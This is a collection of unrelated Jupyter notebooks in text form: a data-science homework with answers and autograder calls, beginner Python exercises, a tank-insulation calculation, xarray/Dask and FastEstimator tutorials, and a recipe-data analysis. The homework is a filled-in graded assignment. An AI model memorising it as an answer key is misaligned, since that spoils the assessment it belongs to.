# **Question 2.** Make an array called `book_title_words` containing the following three strings: "Eats", "Shoots", and "and Leaves".
book_title_words = make_array("Eats", "Shoots", "and Leaves")
book_title_words
_ = ok.grade('q2_2')
# Strings have a method called `join`. `join` takes one argument, an array of strings. It returns a single string. Specifically, the value of `a_string.join(an_array)` is a single string that's the [concatenation](https://en.wikipedia.org/wiki/Concatenation) ("putting together") of all the strings in `an_array`, **except** `a_string` is inserted in between each string.
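# As a quick illustration of how `join` behaves (a plain Python list of strings works the same way as an array of strings here):

```python
words = ["cold", "dark", "night"]
joined = " and ".join(words)
print(joined)  # cold and dark and night
```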
#
# **Question 3.** Use the array `book_title_words` and the method `join` to make two strings:
#
# 1. "Eats, Shoots, and Leaves" (call this one `with_commas`)
# 2. "Eats Shoots and Leaves" (call this one `without_commas`)
#
# *Hint:* If you're not sure what `join` does, first try just calling, for example, `"foo".join(book_title_words)` .
# +
with_commas = ", ".join(book_title_words)
without_commas = " ".join(book_title_words)
# These lines are provided just to print out your answers.
print('with_commas:', with_commas)
print('without_commas:', without_commas)
# -
_ = ok.grade('q2_3')
# ## 3. Indexing Arrays
#
# These exercises give you practice accessing individual elements of arrays. In Python (and in many programming languages), elements are accessed by *index*, so the first element is the element at index 0.
# **Question 1.** The cell below creates an array of some numbers. Set `third_element` to the third element of `some_numbers`.
# +
some_numbers = make_array(-1, -3, -6, -10, -15)
third_element = some_numbers[2]
third_element
# -
_ = ok.grade('q3_1')
# **Question 2.** The next cell creates a table that displays some information about the elements of `some_numbers` and their order. Run the cell to see the partially-completed table, then fill in the missing information in the cell (the strings that are currently "???") to complete the table.
elements_of_some_numbers = Table().with_columns(
"English name for position", make_array("first", "second", "third", "fourth", "fifth"),
"Index", make_array("0", "1", "2", "3", "4"),
"Element", some_numbers)
elements_of_some_numbers
_ = ok.grade('q3_2')
# **Question 3.** You'll sometimes want to find the *last* element of an array. Suppose an array has 142 elements. What is the index of its last element?
index_of_last_element = 141
_ = ok.grade('q3_3')
# More often, you don't know the number of elements in an array, its *length*. (For example, it might be a large dataset you found on the Internet.) The function `len` takes a single argument, an array, and returns the `len`gth of that array (an integer).
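# A quick sketch of the relationship between `len` and the last index (using a small NumPy array for illustration):

```python
import numpy as np

arr = np.array([3, 1, 4, 1, 5])

assert len(arr) == 5
# With 0-based indexing, the last element sits at index len(arr) - 1:
assert arr[len(arr) - 1] == 5
# Negative indices offer a shortcut to the same element:
assert arr[-1] == 5
```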
#
# **Question 4.** The cell below loads an array called `president_birth_years`. The last element in that array is the most recent birth year of any deceased president. Assign that year to `most_recent_birth_year`.
# +
president_birth_years = Table.read_table("president_births.csv").column('Birth Year')
most_recent_birth_year = president_birth_years[-1]  # a negative index counts from the end of the array
most_recent_birth_year
# -
_ = ok.grade('q3_4')
# ## 4. Basic Array Arithmetic
#
# **Question 1.** Multiply the numbers 42, 4224, 42422424, and -250 by 157. For this question, **don't** use arrays.
first_product = 42 * 157
second_product = 4224 * 157
third_product = 42422424 * 157
fourth_product = -250 * 157
print(first_product, second_product, third_product, fourth_product)
_ = ok.grade('q4_1')
# **Question 2.** Now, do the same calculation, but using an array called `numbers` and only a single multiplication (`*`) operator. Store the 4 results in an array named `products`.
numbers = make_array(42,4224,42422424,-250)
products = numbers * 157
products
_ = ok.grade('q4_2')
# **Question 3.** Oops, we made a typo! Instead of 157, we wanted to multiply each number by 1577. Compute the fixed products in the cell below using array arithmetic. Notice that your job is really easy if you previously defined an array containing the 4 numbers.
fixed_products = numbers * 1577
fixed_products
_ = ok.grade('q4_3')
# **Question 4.** We've loaded an array of temperatures in the next cell. Each number is the highest temperature observed on a day at a climate observation station, mostly from the US. Since they're from the US government agency [NOAA](https://www.noaa.gov), all the temperatures are in Fahrenheit. Convert them all to Celsius by first subtracting 32 from them, then multiplying the results by $\frac{5}{9}$. Round each result to the nearest integer using the `np.round` function.
# +
max_temperatures = Table.read_table("temperatures.csv").column("Daily Max Temperature")
celsius_max_temperatures = np.round((max_temperatures - 32)*5/9)
celsius_max_temperatures
# -
_ = ok.grade('q4_4')
# **Question 5.** The cell below loads all the *lowest* temperatures from each day (in Fahrenheit). Compute the size of the daily temperature range for each day. That is, compute the difference between each daily maximum temperature and the corresponding daily minimum temperature. **Give your answer in Celsius!**
# +
min_temperatures = Table.read_table("temperatures.csv").column("Daily Min Temperature")
# A temperature *difference* converts with the 5/9 factor alone (the -32 offsets cancel):
celsius_temperature_ranges = (max_temperatures - min_temperatures) * (5 / 9)
celsius_temperature_ranges
# -
_ = ok.grade('q4_5')
# ## 5. World Population
#
# The cell below loads a table of estimates of the world population for different years, starting in 1950. The estimates come from the [US Census Bureau website](http://www.census.gov/population/international/data/worldpop/table_population.php).
world = Table.read_table("world_population.csv").select('Year', 'Population')
world.show(4)
# The name `population` is assigned to an array of population estimates.
population = world.column(1)
population
# In this question, you will apply some built-in Numpy functions to this array.
# <img src="array_diff.png" style="width: 600px;"/>
#
# The difference function `np.diff` subtracts from each element of an array the element that precedes it. As a result, the array `np.diff` returns is always one element shorter than the input array.
# <img src="array_cumsum.png" style="width: 700px;"/>
#
# The cumulative sum function `np.cumsum` outputs an array of partial sums. For example, the third element in the output array corresponds to the sum of the first, second, and third elements.
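# A small NumPy sketch of how `np.diff` and `np.cumsum` relate (illustrative values only):

```python
import numpy as np

pop = np.array([10, 12, 15, 14, 20])

diffs = np.diff(pop)                 # change between consecutive entries
assert list(diffs) == [2, 3, -1, 6]
assert len(diffs) == len(pop) - 1    # always one shorter than the input

partial = np.cumsum(diffs)           # running total of the changes
assert list(partial) == [2, 5, 4, 10]

# cumsum undoes diff up to the starting value:
assert list(pop[0] + partial) == list(pop[1:])
```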
# **Question 1.** Very often in data science, we are interested in understanding how values change with time. Use `np.diff` and `np.max` (or just `max`) to calculate the largest annual change in population between any two consecutive years.
largest_population_change = np.max(np.diff(population))
largest_population_change
_ = ok.grade('q5_1')
# **Question 2.** Describe in words the result of the following expression. What do the values in the resulting array represent (choose one)?
np.cumsum(np.diff(population))
# 1) The total population change between consecutive years, starting at 1951.
#
# 2) The total population change between 1950 and each later year, starting at 1951.
#
# 3) The total population change between consecutive years and 1950, starting at 1951.
# Assign cumulative_sum_answer to 1, 2, or 3
cumulative_sum_answer = 2  # np.cumsum(np.diff(population)) telescopes to population[i] - population[0]
_ = ok.grade('q5_2')
# ## 6. Old Faithful
#
# **Important**: In this question, the `ok` tests don't tell you whether or not your answer is correct. They only check that your answer is close. However, when the question is graded, we will check for the correct answer. Therefore, you should do your best to submit answers that not only pass the tests, but are also correct.
#
# Old Faithful is a geyser in Yellowstone that erupts every 44 to 125 minutes (according to [Wikipedia](https://en.wikipedia.org/wiki/Old_Faithful)). People are [often told that the geyser erupts every hour](http://yellowstone.net/geysers/old-faithful/), but in fact the waiting time between eruptions is more variable. Let's take a look.
# **Question 1.** The first line below assigns `waiting_times` to an array of 272 consecutive waiting times between eruptions, taken from a classic 1938 dataset. Assign the names `shortest`, `longest`, and `average` so that the `print` statement is correct.
# +
waiting_times = Table.read_table('old_faithful.csv').column('waiting')
shortest = min(waiting_times)
longest = max(waiting_times)
average = np.mean(waiting_times)
print("Old Faithful erupts every", shortest, "to", longest, "minutes and every", average, "minutes on average.")
# -
_ = ok.grade('q6_1')
# **Question 2.** Assign `biggest_decrease` to the biggest decrease in waiting time between two consecutive eruptions. For example, the third eruption occurred after 74 minutes and the fourth after 62 minutes, so the decrease in waiting time was 74 - 62 = 12 minutes. *Hint*: You'll need an array arithmetic function [mentioned in the textbook](https://www.inferentialthinking.com/chapters/04/4/arrays.html#Functions-on-Arrays).
biggest_decrease = abs(min(np.diff(waiting_times)))
biggest_decrease
_ = ok.grade('q6_2')
# **Question 3.** If you expected Old Faithful to erupt every hour, you would expect to wait a total of `60 * k` minutes to see `k` eruptions. Set `difference_from_expected` to an array with 272 elements, where the element at index `i` is the absolute difference between the expected and actual total amount of waiting time to see the first `i+1` eruptions. *Hint*: You'll need to compare a cumulative sum to a range.
#
# For example, since the first three waiting times are 79, 54, and 74, the total waiting time for 3 eruptions is 79 + 54 + 74 = 207. The expected waiting time for 3 eruptions is 60 * 3 = 180. Therefore, `difference_from_expected.item(2)` should be $|207 - 180| = 27$.
difference_from_expected = abs(np.cumsum(waiting_times) - 60 * np.arange(1, len(waiting_times) + 1))
difference_from_expected
_ = ok.grade('q6_3')
# **Question 4.** If instead you guess that each waiting time will be the same as the previous waiting time, how many minutes would your guess differ from the actual time, averaging over every wait time except the first one?
#
# For example, since the first three waiting times are 79, 54, and 74, the average difference between your guess and the actual time for just the second and third eruption would be $\frac{|79-54|+ |54-74|}{2} = 22.5$.
average_error = np.mean(abs(np.diff(waiting_times)))
average_error
_ = ok.grade('q6_4')
# ## 7. Tables
#
# **Question 1.** Suppose you have 4 apples, 3 oranges, and 3 pineapples. (Perhaps you're using Python to solve a high school Algebra problem.) Create a table that contains this information. It should have two columns: "fruit name" and "count". Give it the name `fruits`.
#
# **Note:** Use lower-case and singular words for the name of each fruit, like `"apple"`.
# +
# Our solution uses 1 statement split over 3 lines.
from datascience import *
fruits = Table().with_columns("fruit name",
make_array("apple", "orange", "pineapple"),
"count", make_array(4, 3, 3))
fruits
# -
_ = ok.grade('q7_1')
# **Question 2.** The file `inventory.csv` contains information about the inventory at a fruit stand. Each row represents the contents of one box of fruit. Load it as a table named `inventory`.
inventory = Table.read_table("inventory.csv")
inventory
_ = ok.grade('q7_2')
# **Question 3.** Does each box at the fruit stand contain a different fruit?
# Set all_different to "Yes" if each box contains a different fruit or to "No" if multiple boxes contain the same fruit
all_different = "Yes"
all_different
_ = ok.grade('q7_3')
# **Question 4.** The file `sales.csv` contains the number of fruit sold from each box last Saturday. It has an extra column called "price per fruit (\$)" that's the price *per item of fruit* for fruit in that box. The rows are in the same order as the `inventory` table. Load these data into a table called `sales`.
sales = Table.read_table("sales.csv")
sales
_ = ok.grade('q7_4')
# **Question 5.** How many fruits did the store sell in total on that day?
total_fruits_sold = sum(sales.column("count sold"))  # robust to any number of boxes
total_fruits_sold
_ = ok.grade('q7_5')
# **Question 6.** What was the store's total revenue (the total price of all fruits sold) on that day?
#
# *Hint:* If you're stuck, think first about how you would compute the total revenue from just the grape sales.
total_revenue = sum(sales.column("count sold") *
sales.column("price per fruit ($)"))
total_revenue
_ = ok.grade('q7_6')
# **Question 7.** Make a new table called `remaining_inventory`. It should have the same rows and columns as `inventory`, except that the amount of fruit sold from each box should be subtracted from that box's count, so that the "count" is the amount of fruit remaining after Saturday.
# +
remaining_inventory = inventory.with_columns("count",
(inventory.column("count") - sales.column("count sold")))
remaining_inventory
# -
_ = ok.grade('q7_7')
# ## 8. Submission
#
# Once you're finished, select "Save and Checkpoint" in the File menu and then execute the `submit` cell below. The result will contain a link that you can use to check that your assignment has been submitted successfully. If you submit more than once before the deadline, we will only grade your final submission.
_ = ok.submit()
|
hw02.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <img src="images/tensorflow.jpg">
# ## Exercise 1.
#
# #### Display the number of letters in the string
#
my_word = "<PASSWORD>"
print(#yourcode)
# ## Exercise 2.
#
# #### Display two strings together, with a space in between. Then assign the result to a variable
#
#
# +
string_one = "tensorflow"
string_two = "azerbaijan"
combined = #yourcode
print(combined)
# -
# ## Exercise 3.
#
# #### Display "Azerbaijan" substring of a string
#
#
#
my_word = "<PASSWORD>"
print(#yourcode)
# ## Exercise 4.
#
# #### Display string as "TensorFlowAzerbaijan" by using capitalize() function.
#
#
#
my_word = "<PASSWORD>"
# ## Exercise 5.
#
# #### Use two numbers and calculate their power
base = 5
exponent = 3
result = # your code
print(base,"to the power of",exponent, " = ",result)
# ## Exercise 6.
#
#
# #### Display string as "TensorFlow Azerbaijan"
my_word = "tensorflow<PASSWORD>"
# ## OPTIONAL: Exercise 7.
#
# #### Implement sigmoid function in Python.
#
# The exp() function in Python allows users to calculate the exponential value with the base set to e. The function takes as input the exponent value. The general syntax of the function is:
#
# `math.exp(exponent)`
#
# The Python number method exp() returns the exponential of x: $e^x$ .
#
#
#
# In this exercise, you should implement the sigmoid function in Python. The sigmoid function returns a value between 0 and 1, which makes it well suited to binary classification problems.
#
# <img src="images/sigmoid.png">
#
# For calculating the exponential value in Python, you can refer: https://www.tutorialspoint.com/python/number_exp.htm
#
# For learning more about sigmoid function, you can read:
#
# 1.https://machinelearningmastery.com/a-gentle-introduction-to-sigmoid-function/
#
# 2.https://medium.com/@gabriel.mayers/sigmoid-function-explained-in-less-than-5-minutes-ca156eb3049a
import math  # math must be imported before exp() can be called
math.exp(1)
# +
import math # This will import math module
x=2
print(1/(1 + #yourcode))
# answer should be: 0.8807970779778823
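# If you get stuck, here is one possible implementation sketch (try the exercise yourself first):

```python
import math

def sigmoid(x):
    """Logistic sigmoid: maps any real x into the open interval (0, 1)."""
    return 1.0 / (1.0 + math.exp(-x))

print(sigmoid(2))  # 0.8807970779778823, matching the expected answer above
```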
|
homework_week_1/1. Homework.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from sympy import *
import numpy as np
# +
def m_to_in(arg):
return arg*39.3701
def in_to_m(arg):
return arg/39.3701
# -
# ### Inputs:
P_tanks = 1.379e+6 # Pressure in tanks, Pascals (200 PSI)
# Pressure_Tanks = 101325*2; # Pascals (2ATM)
D_tanks = in_to_m(10) # Diameter of tanks, meters (10 inches)
T_cryo = 90.15 # Kelvin *CHANGE ME* ACCORDING TO WHICH CRYOGENIC FUEL YOU WANT TO EXAMINE
T3 = 270 # Kelvin * CHANGE ME* ACCORDING TO VEHICLE SIZING
# ### Constants:
# +
simgay_al = 324e+6 # Yield tensile strength of Al 6061-T6, Pascals (~47,000 PSI) @ 77.15 K (-196 Celsius)
# Tensile Chosen because structure will be in tension.
# http://www.matweb.com/search/datasheet_print.aspx?matguid=1b8c06d0ca7c456694c7777d9e10be5b
K_CFRP = 7.0 # CFRP Thermal Conductivity, Watts/Meter Kelvin
K_PU = 0.025 # Polyurethane_Thermal_Conductivity, Watts/Meter Kelvin
T_ambient = 299.15 # Kelvin
H = 35 # Convective Heat Transfer Coefficient, Watts/SQR Meter Kelvin
FS = 1.5 # Safety Factor
# -
# ### Calculations:
# +
R1 = D_tanks /2
t = Symbol('t')
R = Symbol('R')
t_al = solve((P_tanks*D_tanks)/(4*t) - simgay_al, t) # thickness of aluminum, meters
t_al = float(t_al[0]) # convert to floating point number
t_al = 0.00635 # override the solved value with a standard 1/4-inch (6.35 mm) plate thickness
R2 = R1 + 1.5 * t_al # Meters
T2 = T_cryo # Kelvin Assumption: WORST CASE
L = 1.0
R_soln = solve(2*np.pi*R*L*H*(T_ambient-T3) - ((2*pi*L)*K_PU*(T3-T2)/log(R/R2)), R)
print('Thickness Aluminum:', m_to_in(t_al), 'in')
print('Radius3:', m_to_in(R_soln[0]), 'in')
print('Thickness of Polyurethane:', m_to_in(R_soln[0]-R2), 'in')
# -
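# The `solve` call above has a closed form: setting the longitudinal stress $\sigma = PD/(4t)$ equal to the yield strength gives $t = PD/(4\sigma)$. A quick sanity check with the same inputs (the variable names below are local to this sketch):

```python
P = 1.379e6            # tank pressure, Pa
D = 10 / 39.3701       # 10 in tank diameter, converted to meters
sigma_y = 324e6        # Al 6061-T6 yield strength at cryogenic temperature, Pa

t_required = P * D / (4 * sigma_y)
print(t_required)      # roughly 2.7e-4 m, far below the 6.35 mm plate used above
```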
|
jupyter/TPS_tanks.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# # Xarray with Dask Arrays
#
# <img src="images/dataset-diagram-logo.png"
# align="right"
# width="66%"
# alt="Xarray Dataset">
#
# **[Xarray](http://xarray.pydata.org/en/stable/)** is an open source project and Python package that extends the labeled data functionality of [Pandas](https://pandas.pydata.org/) to N-dimensional array-like datasets. It shares a similar API to [NumPy](http://www.numpy.org/) and [Pandas](https://pandas.pydata.org/) and supports both [Dask](https://dask.org/) and [NumPy](http://www.numpy.org/) arrays under the hood.
# +
# %matplotlib inline
from dask.distributed import Client
import xarray as xr
# -
# ## Start Dask Client for Dashboard
#
# Starting the Dask Client is optional. It will provide a dashboard which
# is useful to gain insight on the computation.
#
# The link to the dashboard will become visible when you create the client below. We recommend having it open on one side of your screen while using your notebook on the other side. This can take some effort to arrange your windows, but seeing them both at the same time is very useful when learning.
client = Client(n_workers=8, threads_per_worker=2, memory_limit='1GB')
client
# ## Open a sample dataset
#
# We will use some of xarray's tutorial data for this example. By specifying the chunk shape, xarray will automatically create Dask arrays for each data variable in the `Dataset`. In xarray, `Datasets` are dict-like containers of labeled arrays, analogous to the `pandas.DataFrame`. Note that we're taking advantage of xarray's dimension labels when specifying chunk shapes.
ds = xr.tutorial.open_dataset('air_temperature',
chunks={'lat': 25, 'lon': 25, 'time': -1})
ds
# Quickly inspecting the `Dataset` above, we'll note that this `Dataset` has three _dimensions_ akin to axes in NumPy (`lat`, `lon`, and `time`), three _coordinate variables_ akin to `pandas.Index` objects (also named `lat`, `lon`, and `time`), and one data variable (`air`). Xarray also holds Dataset-specific metadata as _attributes_.
da = ds['air']
da
# Each data variable in xarray is called a `DataArray`. These are the fundamental labeled array objects in xarray. Much like the `Dataset`, `DataArrays` also have _dimensions_ and _coordinates_ that support many of their label-based operations.
da.data
# Accessing the underlying array of data is done via the `data` property. Here we can see that we have a Dask array. If this array were to be backed by a NumPy array, this property would point to the actual values in the array.
# ## Use Standard Xarray Operations
#
# In almost all cases, operations using xarray objects are identical, regardless if the underlying data is stored as a Dask array or a NumPy array.
da2 = da.groupby('time.month').mean('time')
da3 = da - da2
da3
# Call `.compute()` or `.load()` when you want your result as an `xarray.DataArray` with data stored as NumPy arrays.
#
# If you started `Client()` above then you may want to watch the status page during computation.
computed_da = da3.load()
type(computed_da.data)
computed_da
# ## Persist data in memory
#
# If you have the available RAM for your dataset then you can persist data in memory.
#
# This allows future computations to be much faster.
da = da.persist()
# ## Time Series Operations
#
# Because we have a datetime index, time-series operations work efficiently. Here we demo the use of xarray's resample method:
da.resample(time='1w').mean('time').std('time')
da.resample(time='1w').mean('time').std('time').load().plot(figsize=(12, 8))
# and rolling window operations:
da_smooth = da.rolling(time=30).mean().persist()
da_smooth
# Since xarray stores each of its coordinate variables in memory, slicing by label is trivial and entirely lazy.
# %time da.sel(time='2013-01-01T18:00:00')
# %time da.sel(time='2013-01-01T18:00:00').load()
# ## Custom workflows and automatic parallelization
# Almost all of xarray’s built-in operations work on Dask arrays. If you want to use a function that isn’t wrapped by xarray, one option is to extract Dask arrays from xarray objects (.data) and use Dask directly.
#
# Another option is to use xarray’s `apply_ufunc()` function, which can automate embarrassingly parallel “map” type operations where a function written for processing NumPy arrays is repeatedly applied to xarray objects containing Dask arrays. It works similarly to `dask.array.map_blocks()` and `dask.array.atop()`, but without requiring an intermediate layer of abstraction.
#
# Here we show an example using NumPy operations and a fast function from `bottleneck`, which we use to calculate Spearman’s rank-correlation coefficient:
# +
import numpy as np
import xarray as xr
import bottleneck
def covariance_gufunc(x, y):
return ((x - x.mean(axis=-1, keepdims=True))
* (y - y.mean(axis=-1, keepdims=True))).mean(axis=-1)
def pearson_correlation_gufunc(x, y):
return covariance_gufunc(x, y) / (x.std(axis=-1) * y.std(axis=-1))
def spearman_correlation_gufunc(x, y):
x_ranks = bottleneck.rankdata(x, axis=-1)
y_ranks = bottleneck.rankdata(y, axis=-1)
return pearson_correlation_gufunc(x_ranks, y_ranks)
def spearman_correlation(x, y, dim):
return xr.apply_ufunc(
spearman_correlation_gufunc, x, y,
input_core_dims=[[dim], [dim]],
dask='parallelized',
output_dtypes=[float])
# -
# In the examples above, we were working with some air temperature data. For this example, we'll calculate the Spearman correlation using the raw air temperature data and the smoothed version that we also created (`da_smooth`). For this, we'll also have to rechunk the data ahead of time.
corr = spearman_correlation(da.chunk({'time': -1}),
da_smooth.chunk({'time': -1}),
'time')
corr
corr.plot(figsize=(12, 8))
|
Spring_2019/LB29/xarray_DASKTUT.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# pre-analysis:
# tags: single tag stats; overlapped tag stats; recipe with multiple tags;
# instruction data: length; word-frequency statistics; (broken down by category)
original = pd.read_csv('/Users/hetianbai/Desktop/Plated/nyu_recipe_data.csv')
original.info()
df = pd.read_csv('/Users/hetianbai/Desktop/Plated/cleaned_recipe_data.csv')
df.info()
# total number of recipes:
print('total number of recipes:',df.shape[0])
# total number of tags (note: `tags` is defined a few cells below, so run that cell first):
print('total number of tags:', tags.shape[1] + 2)
print('total number of tags in model:', tags.shape[1])
# Removed very rare tags: tag_cuisine_nordic, tag_cuisine_african
data = df[['carbs', 'fat','title',
'protein','calories', 'step_one', 'step_two', 'step_three',
'step_four', 'step_five', 'step_six',
'tag_cuisine_indian',
'tag_cuisine_asian', 'tag_cuisine_mexican',
'tag_cuisine_latin-american', 'tag_cuisine_french',
'tag_cuisine_italian',
'tag_cuisine_mediterranean', 'tag_cuisine_american',
'tag_cuisine_middle-eastern']]
# a flat list of names (a nested list would create a MultiIndex):
data.columns = ['carbs', 'fat', 'title',
                'protein', 'calories', 'step_one', 'step_two', 'step_three',
                'step_four', 'step_five', 'step_six', 'Indian', 'Asian', 'Mexican', 'Latin-american',
                'French', 'Italian', 'Mediterranean', 'American', 'Middle-eastern']
tags = data[['Indian', 'Asian', 'Mexican','Latin-american',\
'French','Italian','Mediterranean','American','Middle-eastern']]
tags_sum = pd.DataFrame(np.sum(tags,axis=0), columns=['counts'])
tags_sum
# +
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
rs = np.random.RandomState(8)
# Set up the matplotlib figure
f, ax = plt.subplots(figsize=(14,8))
# Generate some sequential data
x = np.array(tags_sum.index)
y = np.array(tags_sum.counts)
sns.barplot(x, y,color="steelblue", ax=ax)
ax.set_ylabel("Number of recipes")
ax.set_xlabel("Cuisines")
plt.title('Number of Recipes by Cuisines')
# -
# Recipes with multiple tags:
tags['sum'] = np.array(np.sum(tags,axis=1))
tags = tags[tags['sum']>0]
tags_multi = tags[tags['sum']>1]
del tags_multi['sum']
annot_count = np.zeros([9,9])
for i, tag1 in enumerate(list(tags_sum.index)):
for j, tag2 in enumerate(list(tags_sum.index)):
if i==j:
annot_count[i][j] = int((np.array(np.sum(tags_multi[[tag1]],axis=1))>0).sum())
else:
annot_count[i][j] = int((np.array(np.sum(tags_multi[[tag1,tag2]],axis=1))>1).sum())
for i, tag in enumerate(list(tags_sum.index)):
annot_count[i][i] = int(tags[tags[tag]==1].shape[0])
# heat map of recipes with multiple tags
plt.figure(figsize = (12,12))
sns.set(font_scale=1.5)
sns.heatmap(tags_multi.corr(method='pearson', min_periods=1), annot = annot_count, vmax=.4, square=True, annot_kws={"size": 16})
def count_length(col):
length = np.zeros(len(data[col]))
for i,v in enumerate(list(data[col].values)):
if isinstance(v, float):
length[i] = 0
else:
length[i] = len(v.split())
return length
# +
for col in ['step_one', 'step_two', 'step_three', 'step_four', 'step_five', 'step_six']:
n = col+'_length'
data[n]=count_length(col)
data['mean_length'] = data.iloc[:, -6:].mean(axis=1)  # average over the six *_length columns just added
# -
sns.set_style("white")
plt.figure(figsize = (12,8))
for tag in list(tags_sum.index):
sns.distplot(data[data[tag]>0]['mean_length'], bins=50, label= tag, hist=False);
plt.legend()
plt.xlabel('Instruction Length')
plt.title('Instruction Length distribution by Cuisine')
# ### Single Tag statistics:
for tag in list(tags_sum.index):
print('>>>>>', tag)
    print('* Number of recipes:', tags_sum.loc[tag].values)
print('* Average Instruction length:', np.mean(data[data[tag] > 0]['mean_length']))
# print('* Calories:', np.mean(int(data[data[tag] > 0]['calories'])))
# ### High frequent word statistics:
# +
import string
import pickle as pkl
import random
from collections import Counter, defaultdict
from nltk.tokenize import word_tokenize
from collections import Counter
# lowercase and remove punctuation
def tokenizer(sent):
#print(sent)
if pd.isnull(sent):
words = []
else:
table = str.maketrans(string.punctuation, ' '*len(string.punctuation))
sent = sent.translate(table)
tokens = word_tokenize(sent)
# convert to lower case
tokens = [w.lower() for w in tokens]
# remove punctuation from each word
#table = str.maketrans('', '', string.punctuation)
#stripped = [w.translate(table) for w in tokens]
# remove remaining tokens that are not alphabetic
words = [word for word in tokens if word.isalpha()]
#re.findall(r'\d+', 'sdfa')
return words
def tokenize_dataset(step_n):
    """Return the tokens for every sample in one step column, flattened into a single list."""
token_dataset = []
for sample in step_n:
tokens = tokenizer(sample)
token_dataset.extend(tokens)
return token_dataset
# -
for tag in list(tags_sum.index):
words_bucket = []
for step in ['step_one', 'step_two', 'step_three', 'step_four', 'step_five', 'step_six']:
words_bucket.extend(tokenize_dataset(data[data[tag] > 0][step]))
ordered_dict = Counter(words_bucket)
print(tag)
print(ordered_dict.most_common(260)[20:])
|
src/data/.ipynb_checkpoints/Plated Instruction Data Pre-Analysis-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Tutorial 7: Estimator
#
# ## Overview
# In this tutorial, we will talk about:
# * [Estimator API](#t07estimator)
# * [Reducing the number of training steps per epoch](#t07train)
# * [Reducing the number of evaluation steps per epoch](#t07eval)
# * [Changing logging behavior](#t07logging)
# * [Monitoring intermediate results during training](#t07intermediate)
# * [Trace](#t07trace)
# * [Concept](#t07concept)
# * [Structure](#t07structure)
# * [Usage](#t07usage)
# * [Model Testing](#t07testing)
# * [Related Apphub Examples](#t07apphub)
# `Estimator` is the API that manages everything related to the training loop. It combines `Pipeline` and `Network` together and provides users with fine-grain control over the training loop. Before we demonstrate different ways to control the training loop let's define a template similar to [tutorial 1](./t01_getting_started.ipynb), but this time we will use a PyTorch model.
# +
import tempfile

import fastestimator as fe
from fastestimator.architecture.pytorch import LeNet
from fastestimator.dataset.data import mnist
from fastestimator.op.numpyop.univariate import ExpandDims, Minmax
from fastestimator.op.tensorop.loss import CrossEntropy
from fastestimator.op.tensorop.model import ModelOp, UpdateOp
from fastestimator.trace.io import BestModelSaver
from fastestimator.trace.metric import Accuracy
def get_estimator(log_steps=100, monitor_names=None, use_trace=False, max_train_steps_per_epoch=None, epochs=2):
# step 1
train_data, eval_data = mnist.load_data()
test_data = eval_data.split(0.5)
pipeline = fe.Pipeline(train_data=train_data,
eval_data=eval_data,
test_data=test_data,
batch_size=32,
ops=[ExpandDims(inputs="x", outputs="x", axis=0), Minmax(inputs="x", outputs="x")])
# step 2
model = fe.build(model_fn=LeNet, optimizer_fn="adam", model_name="LeNet")
network = fe.Network(ops=[
ModelOp(model=model, inputs="x", outputs="y_pred"),
CrossEntropy(inputs=("y_pred", "y"), outputs="ce"),
CrossEntropy(inputs=("y_pred", "y"), outputs="ce1"),
UpdateOp(model=model, loss_name="ce")
])
# step 3
traces = None
if use_trace:
traces = [Accuracy(true_key="y", pred_key="y_pred"),
BestModelSaver(model=model, save_dir=tempfile.mkdtemp(), metric="accuracy", save_best_mode="max")]
estimator = fe.Estimator(pipeline=pipeline,
network=network,
epochs=epochs,
traces=traces,
max_train_steps_per_epoch=max_train_steps_per_epoch,
log_steps=log_steps,
monitor_names=monitor_names)
return estimator
# -
# Let's train our model using the default `Estimator` arguments:
est = get_estimator()
est.fit()
# <a id='t07estimator'></a>
# ## Estimator API
# <a id='t07train'></a>
# ### Reduce the number of training steps per epoch
# In general, one epoch of training means that every element in the training dataset will be visited exactly one time. If evaluation data is available, evaluation happens after every epoch by default. Consider the following two scenarios:
#
# * The training dataset is very large such that evaluation needs to happen multiple times during one epoch.
# * Different training datasets are being used for different epochs, but the number of training steps should be consistent between each epoch.
#
# One easy solution to the above scenarios is to limit the number of training steps per epoch. For example, if we want to train for only 300 steps per epoch, with training lasting for 4 epochs (1200 steps total), we would do the following:
est = get_estimator(max_train_steps_per_epoch=300, epochs=4)
est.fit()
# <a id='t07eval'></a>
# ### Reduce the number of evaluation steps per epoch
# One may need to reduce the number of evaluation steps for debugging purposes. This can be easily done by setting the `max_eval_steps_per_epoch` argument in `Estimator`.
# <a id='t07logging'></a>
# ### Change logging behavior
# When the number of training epochs is large, the log can become verbose. You can change the logging behavior by choosing one of following options:
# * set `log_steps` to `None` if you do not want to see any training logs printed.
# * set `log_steps` to 0 if you only wish to see the evaluation logs.
# * set `log_steps` to some integer 'x' if you want training logs to be printed every 'x' steps.
#
# Let's set the `log_steps` to 0:
est = get_estimator(max_train_steps_per_epoch=300, epochs=4, log_steps=0)
est.fit()
# <a id='t07intermediate'></a>
# ### Monitor intermediate results
# You might have noticed that in our example `Network` there is an op: `CrossEntropy(inputs=("y_pred", "y"), outputs="ce1")`. However, `ce1` never shows up in the training log above. This is because FastEstimator identifies and filters out unused variables to reduce unnecessary communication between the GPU and CPU. In contrast, `ce` shows up in the log because, by default, we log all loss values that are used to update models.
#
# But what if we want to see the value of `ce1` throughout training?
#
# Easy: just add `ce1` to `monitor_names` in `Estimator`.
est = get_estimator(max_train_steps_per_epoch=300, epochs=4, log_steps=150, monitor_names="ce1")
est.fit()
# As we can see, both `ce` and `ce1` showed up in the log above. Unsurprisingly, their values are identical because they have the same inputs and forward function.
# <a id='t07trace'></a>
